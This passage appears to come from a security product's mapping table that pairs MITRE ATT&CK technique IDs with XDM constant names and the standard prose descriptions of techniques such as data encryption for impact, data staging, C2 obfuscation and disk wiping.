Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data
compression, such as gzip. https://attack.mitre.org/techniques/T1132/001

T1486 XDM_CONST.MITRE_TECHNIQUE_DATA_ENCRYPTED_FOR_IMPACT Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt
availability to system and network resources. They can attempt to render stored data inaccessible by
encrypting files or data on local and remote drives and withholding access to a decryption key. This may be
done in order to extract monetary compensation from a victim in exchange for decryption or a decryption
key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or
transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT
NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common
user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted.
In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-
CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting
data may have worm-like features to propagate across a network by leveraging other attack techniques like
[Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://
attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/
T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) In cloud environments,
storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part
1) https://attack.mitre.org/techniques/T1486

T1565 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity.
By manipulating data, adversaries may attempt to affect a business process, organizational understanding,
or decision making. The type of modification and the impact it will have depends on the target application
and process as well as the goals and objectives of the adversary. For complex systems, an adversary
would likely need special expertise and possibly access to specialized software related to the system that
would typically be gained through a prolonged information gathering campaign in order to have the desired
impact. https://attack.mitre.org/techniques/T1565

T1565.003 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION_RUNTIME_DATA_MANIPULATION Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end
user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data,
adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations.
Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/
T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The
type of modification and the impact it will have depends on the target application and process as well as the
goals and objectives of the adversary. For complex systems, an adversary would likely need special
expertise and possibly access to specialized software related to the system that would typically be gained
through a prolonged information gathering campaign in order to have the desired impact. https://
attack.mitre.org/techniques/T1565/003

T1565.001 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION_STORED_DATA_MANIPULATION Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide
activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data,
adversaries may attempt to affect a business process, organizational understanding, and decision making.
Stored data could include a variety of file formats, such as Office files, databases, stored emails, and
custom file formats. The type of modification and the impact it will have depends on the type of data as well
as the goals and objectives of the adversary. For complex systems, an adversary would likely need special
expertise and possibly access to specialized software related to the system that would typically be gained
through a prolonged information gathering campaign in order to have the desired impact. https://
attack.mitre.org/techniques/T1565/001

T1565.002 XDM_CONST.MITRE_TECHNIQUE_DATA_MANIPULATION_TRANSMITTED_DATA_MANIPULATION Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes
or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating
transmitted data, adversaries may attempt to affect a business process, organizational understanding, and
decision making. Manipulation may be possible over a network connection or between system processes
where there is an opportunity deploy a tool that will intercept and change information. The type of
modification and the impact it will have depends on the target transmission mechanism as well as the goals
and objectives of the adversary. For complex systems, an adversary would likely need special expertise
and possibly access to specialized software related to the system that would typically be gained through a
prolonged information gathering campaign in order to have the desired impact. https://attack.mitre.org/
techniques/T1565/002

T1001 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and
control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content
more difficult to discover or decipher and to make the communication less conspicuous and hide
commands from being seen. This encompasses many methods, such as adding junk data to protocol
traffic, using steganography, or impersonating legitimate protocols. https://attack.mitre.org/techniques/
T1001
Original Mapped Description

T1001.001 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION_JUNK_DATA Adversaries may add junk data to protocols used for command and control to make detection more difficult.
By adding random or meaningless data to the protocols used for command and control, adversaries can
prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include
appending/prepending data with junk characters or writing junk characters between significant characters.
https://attack.mitre.org/techniques/T1001/001

T1001.003 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION_PROTOCOL_IMPERSONATION Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control
activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can
make their command and control traffic blend in with legitimate network traffic. Adversaries may
impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted,
potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted
entity. https://attack.mitre.org/techniques/T1001/003

T1001.002 XDM_CONST.MITRE_TECHNIQUE_DATA_OBFUSCATION_STEGANOGRAPHY Adversaries may use steganographic techniques to hide command and control traffic to make detection
efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are
transferred between systems. This hidden information can be used for command and control of
compromised systems. In some cases, the passing of files embedded using steganography, such as image
or document files, can be used for command and control. https://attack.mitre.org/techniques/T1001/002

T1074 XDM_CONST.MITRE_TECHNIQUE_DATA_STAGED Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept
in separate files or combined into one file through techniques such as [Archive Collected Data](https://
attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality
within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging
location.(Citation: PWC Cloud Hopper April 2017) In cloud environments, adversaries may stage data
within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance]
(https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-
Trends 2020) Adversaries may choose to stage data from a victim network in a centralized location prior to
Exfiltration to minimize the number of connections made to their C2 server and better evade detection.
https://attack.mitre.org/techniques/T1074

T1074.001 XDM_CONST.MITRE_TECHNIQUE_DATA_STAGED_LOCAL_DATA_STAGING Adversaries may stage collected data in a central location or directory on the local system prior to
Exfiltration. Data may be kept in separate files or combined into one file through techniques such as
[Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be
used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be
used to copy data into a staging location. https://attack.mitre.org/techniques/T1074/001

T1074.002 XDM_CONST.MITRE_TECHNIQUE_DATA_STAGED_REMOTE_DATA_STAGING Adversaries may stage data collected from multiple systems in a central location or directory on one system
prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as
[Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be
used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be
used to copy data into a staging location. In cloud environments, adversaries may stage data within a
particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://
attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020)
By staging data on one system prior to Exfiltration, adversaries can minimize the number of connections
made to their C2 server and better evade detection. https://attack.mitre.org/techniques/T1074/002

T1030 XDM_CONST.MITRE_TECHNIQUE_DATA_TRANSFER_SIZE_LIMITS An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below
certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
https://attack.mitre.org/techniques/T1030

T1530 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CLOUD_STORAGE_OBJECT Adversaries may access data objects from improperly secured cloud storage. Many cloud service providers
offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage.
These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no
overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs.
Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3
Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best
Practices, 2019) Misconfiguration by end users is a common problem. There have been numerous
incidents where cloud storage has been improperly secured (typically by unintentionally allowing public
access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards,
personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro
S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach,
2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way
to gain access to cloud storage objects that have access permission controls. https://attack.mitre.org/
techniques/T1530

T1602 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CONFIGURATION_REPOSITORY Adversaries may collect data related to managed devices from configuration repositories. Configuration
repositories are used by management systems in order to configure, manage, and control data on remote
systems. Configuration repositories may also facilitate remote access and administration of devices.
Adversaries may target these repositories in order to collect large quantities of sensitive system
administration data. Data from configuration repositories may be exposed by various protocols and
software and can store a wide variety of data, much of which may align with adversary Discovery
objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017) https://
attack.mitre.org/techniques/T1602

T1602.002 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CONFIGURATION_REPOSITORY_NETWORK_DEVICE_CONFIGURATION_DUMP Adversaries may access network configuration files to collect sensitive data about the device and the
network. The network configuration is a file containing parameters that determine the operation of the
device. The device typically stores an in-memory copy of the configuration while operating, and a separate
configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration
files to reveal information about the target network and its layout, the network device and its software, or
identifying legitimate accounts and credentials for later use. Adversaries can use common management
tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to
access network configuration files. (Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)
(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a
configuration repository or configure the device to export the configuration for later analysis. https://
attack.mitre.org/techniques/T1602/002

T1602.001 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_CONFIGURATION_REPOSITORY_SNMP Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable
information in a network managed using Simple Network Management Protocol (SNMP). The MIB is a
configuration repository that stores variable information accessible via SNMP in the form of object
identifiers (OID). Each OID identifies a variable that can be read or set and permits active management
tasks, such as configuration changes, through remote modification of these variables. SNMP can give
administrators great insight in their systems, such as, system information, description of hardware, physical
location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP
Securing SNMP). The MIB may also contain device operational information, including running configuration,
routing table, and interface details. Adversaries may use SNMP queries to collect MIB content directly from
SNMP-managed devices in order to collect network information that allows the adversary to build network
maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy
Device Attacks) https://attack.mitre.org/techniques/T1602/001

T1213 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES Adversaries may leverage information repositories to mine valuable information. Information repositories
are tools that allow for storage of information, typically to facilitate collaboration or information sharing
between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct
access to the target information. Adversaries may also abuse external sharing features to share sensitive
documents with recipients outside of the organization. The following is a brief list of example information
that may hold potential value to an adversary and may also be found on an information repository: *
Policies, procedures, and standards * Physical / logical network diagrams * System architecture diagrams *
Technical system documentation * Testing / development credentials * Work / project schedules * Source
code snippets * Links to network shares and other internal resources Information stored in a repository may
vary based on the specific instance or environment. Specific common information repositories include web-
based platforms such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) and [Confluence]
(https://attack.mitre.org/techniques/T1213/001), specific services such as Code Repositories, IaaS
databases, enterprise databases, and other storage infrastructure such as SQL Server. https://
attack.mitre.org/techniques/T1213
Original Mapped Description

T1213.003 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES_CODE_REPOSITORIES Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/
services that store source code and automate software builds. They may be hosted internally or privately
on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code
repositories through a web application or command-line utilities such as git. Once adversaries gain access
to a victim network or a private code repository, they may collect sensitive information such as proprietary
source code or credentials contained within software's source code. Having access to software's source
code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while
credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/
techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) https://attack.mitre.org/
techniques/T1213/003

T1213.001 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES_CONFLUENCE Adversaries may leverage Confluence repositories to mine valuable information. Often found in
development environments alongside Atlassian JIRA, Confluence is generally used to store development-
related documentation, however, in general may contain more diverse categories of useful information,
such as: * Policies, procedures, and standards * Physical / logical network diagrams * System architecture
diagrams * Technical system documentation * Testing / development credentials * Work / project schedules
* Source code snippets * Links to network shares and other internal resources https://attack.mitre.org/
techniques/T1213/001

T1213.002 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_INFORMATION_REPOSITORIES_SHAREPOINT Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint
will often contain useful information for an adversary to learn about the structure and functionality of the
internal network and systems. For example, the following is a list of example information that may hold
potential value to an adversary and may also be found on SharePoint: * Policies, procedures, and
standards * Physical / logical network diagrams * System architecture diagrams * Technical system
documentation * Testing / development credentials * Work / project schedules * Source code snippets *
Links to network shares and other internal resources https://attack.mitre.org/techniques/T1213/002

T1005 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_LOCAL_SYSTEM Adversaries may search local system sources, such as file systems or local databases, to find files of
interest and sensitive data prior to Exfiltration. Adversaries may do this using a [Command and Scripting
Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/
S0106), which has functionality to interact with the file system to gather information. Some adversaries may
also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system. https://
attack.mitre.org/techniques/T1005

T1039 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_NETWORK_SHARED_DRIVE Adversaries may search network shares on computers they have compromised to find files of interest.
Sensitive data can be collected from remote systems via shared network drives (host shared directory,
network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive
command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/
S0106) may be used to gather information. https://attack.mitre.org/techniques/T1039

T1025 XDM_CONST.MITRE_TECHNIQUE_DATA_FROM_REMOVABLE_MEDIA Adversaries may search connected removable media on computers they have compromised to find files of
interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.)
connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and
common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather
information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/
T1119) on removable media. https://attack.mitre.org/techniques/T1025

T1491 XDM_CONST.MITRE_TECHNIQUE_DEFACEMENT Adversaries may modify visual content available internally or externally to an enterprise network. Reasons
for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or
claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of
[Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure
compliance with accompanying messages. https://attack.mitre.org/techniques/T1491

T1491.002 XDM_CONST.MITRE_TECHNIQUE_DEFACEMENT_EXTERNAL_DEFACEMENT An adversary may deface systems external to an organization in an attempt to deliver messaging,
intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim
of defacement; often targeted by adversary and hacktivist groups in order to push a political message or
spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement
to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site)
[External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger
events, or as a response to actions taken by an organization or government. Similarly, website defacement
may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://
attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement) https://
attack.mitre.org/techniques/T1491/002

T1491.001 XDM_CONST.MITRE_TECHNIQUE_DEFACEMENT_INTERNAL_DEFACEMENT An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users.
This may take the form of modifications to internal websites, or directly to user systems with the
replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may
be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause
user discomfort, or to pressure compliance with accompanying messages. Since internally defacing
systems exposes an adversary's presence, it often takes place after other intrusion goals have been
accomplished.(Citation: Novetta Blockbuster Destructive Malware) https://attack.mitre.org/techniques/
T1491/001

T1140 XDM_CONST.MITRE_TECHNIQUE_DEOBFUSCATE_DECODE_FILES_OR_INFORMATION Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide

artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate
that information depending on how they intend to use it. Methods for doing that include built-in functionality
of malware or by using utilities present on the system. One such example is use of [certutil](https://
attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been
hidden inside a certificate file. (Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another
example is using the Windows copy /b command to reassemble binary fragments into a malicious
payload. (Citation: Carbon Black Obfuscation Sept 2016) Sometimes a user's action may be required to
open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/
T1204). The user may also be required to input a password to open a password protected compressed/
encrypted file that was provided by the adversary. (Citation: Volexity PowerDuke November 2016) https://
attack.mitre.org/techniques/T1140

T1610 XDM_CONST.MITRE_TECHNIQUE_DEPLOY_CONTAINER Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some
cases, adversaries may deploy a new container to execute processes associated with a particular image or
deployment, such as processes that execute or download malware. In others, an adversary may deploy a
new container configured without network rules, user limitations, etc. to bypass existing defenses within the
environment. Containers can be deployed by various means, such as via Docker's create and start APIs
or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)
(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based
on retrieved or built malicious images or from benign images that download and execute malicious
payloads at runtime.(Citation: Aqua Build Images on Hosts) https://attack.mitre.org/techniques/T1610

T1587 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely
downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the
process of identifying development requirements and building solutions such as malware, exploits, and self-
signed certificates. Adversaries may develop capabilities to support their operations throughout numerous
phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation:
Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020) As with legitimate development
efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-
house, or may need to be contracted out. Use of a contractor may be considered an extension of that
adversary's development capabilities, provided the adversary plays a role in shaping requirements and
maintains a degree of exclusivity to the capability. https://attack.mitre.org/techniques/T1587
Original Mapped Description

T1587.002 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_CODE_SIGNING_CERTIFICATES Adversaries may create self-signed code signing certificates that can be used during targeting. Code
signing is the process of digitally signing executables and scripts to confirm the software author and
guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for
a program from the developer and a guarantee that the program has not been tampered with.(Citation:
Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an
unsigned piece of code even if they don't know who issued the certificate or who the author is. Prior to
[Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code
signing certificates for use in operations. https://attack.mitre.org/techniques/T1587/002

T1587.003 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_DIGITAL_CERTIFICATES Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS
certificates are designed to instill trust. They include information about the key, information about its owner's
identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the
signature is valid, and the person examining the certificate trusts the signer, then they know they can use
that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of
trust associated with the signature of a third-party certificate authority (CA). Adversaries may create self-
signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex:
[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://
attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/
techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/
techniques/T1553/004)). After creating a digital certificate, an adversary may then install that certificate
(see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their
control. https://attack.mitre.org/techniques/T1587/003

T1587.004 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_EXPLOITS Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or
vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or
software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an
adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired
via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As
part of the exploit development process, adversaries may uncover exploitable vulnerabilities through
methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017) As with legitimate
development efforts, different skill sets may be required for developing exploits. The skills needed may be
located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of
that adversary's exploit development capabilities, provided the adversary plays a role in shaping
requirements and maintains an initial degree of exclusivity to the exploit. Adversaries may use exploits
during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://
attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/
T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for
Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://
attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/
T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)). https://
attack.mitre.org/techniques/T1587/004

T1587.001 XDM_CONST.MITRE_TECHNIQUE_DEVELOP_CAPABILITIES_MALWARE Adversaries may develop malware and malware components that can be used during targeting. Building
malicious software can include the development of payloads, droppers, post-compromise tools, backdoors
(including backdoored images), packers, C2 protocols, and the creation of infected removable media.
Adversaries may develop malware to support their operations, creating a means for maintaining control of
remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)
(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB) As with
legitimate development efforts, different skill sets may be required for developing malware. The skills
needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered
an extension of that adversary's malware development capabilities, provided the adversary plays a role in
shaping requirements and maintains a degree of exclusivity to the malware. Some aspects of malware
development, such as C2 protocol development, may require adversaries to obtain additional infrastructure.
For example, malware developed that will communicate with Twitter for C2, may require use of [Web
Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29) https://attack.mitre.org/
techniques/T1587/001

T1006 XDM_CONST.MITRE_TECHNIQUE_DIRECT_VOLUME_ACCESS Adversaries may directly access a volume to bypass file access controls and file system monitoring.
Windows allows programs to have direct access to logical volumes. Programs with direct access may read
and write files directly from the drive by analyzing file system data structures. This technique bypasses
Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009) Utilities,
such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)
https://attack.mitre.org/techniques/T1006

T1561 XDM_CONST.MITRE_TECHNIQUE_DISK_WIPE Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to
interrupt availability to system and network resources. With direct write access to a disk, adversaries may
attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or
wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be
attempted. To maximize impact on the target organization in operations where network-wide availability
interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a
network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/
T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin
Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
https://attack.mitre.org/techniques/T1561

T1561.001 XDM_CONST.MITRE_TECHNIQUE_DISK_WIPE_DISK_CONTENT_WIPE Adversaries may erase the contents of storage devices on specific systems or in large numbers in a
network to interrupt availability to system and network resources. Adversaries may partially or completely
overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.
(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus
Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe
arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard
drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster
Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://
attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation:
Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://
attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files. To
maximize impact on the target organization in operations where network-wide availability interruption is the
goal, malware used for wiping disk content may have worm-like features to propagate across a network by
leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS
Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://
attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware) https://
attack.mitre.org/techniques/T1561/001

T1561.002 XDM_CONST.MITRE_TECHNIQUE_DISK_WIPE_DISK_STRUCTURE_WIPE Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system;
targeting specific critical systems or in large numbers in a network to interrupt availability to system and
network resources. Adversaries may attempt to render the system unable to boot by overwriting critical data
located in structures such as the master boot record (MBR) or partition table.(Citation: Symantec Shamoon
2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky
StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) The data contained in disk structures may include the
initial executable code for loading an operating system or the location of the file system partitions on disk. If
this information is not present, the computer will not be able to load an operating system during the boot
process, leaving the computer unavailable. [Disk Structure Wipe](https://attack.mitre.org/techniques/
T1561/002) may be performed in isolation, or along with [Disk Content Wipe](https://attack.mitre.org/
techniques/T1561/001) if all sectors of a disk are wiped. To maximize impact on the target organization,
malware designed for destroying disk structures may have worm-like features to propagate across a
network by leveraging other techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078),
[OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares]
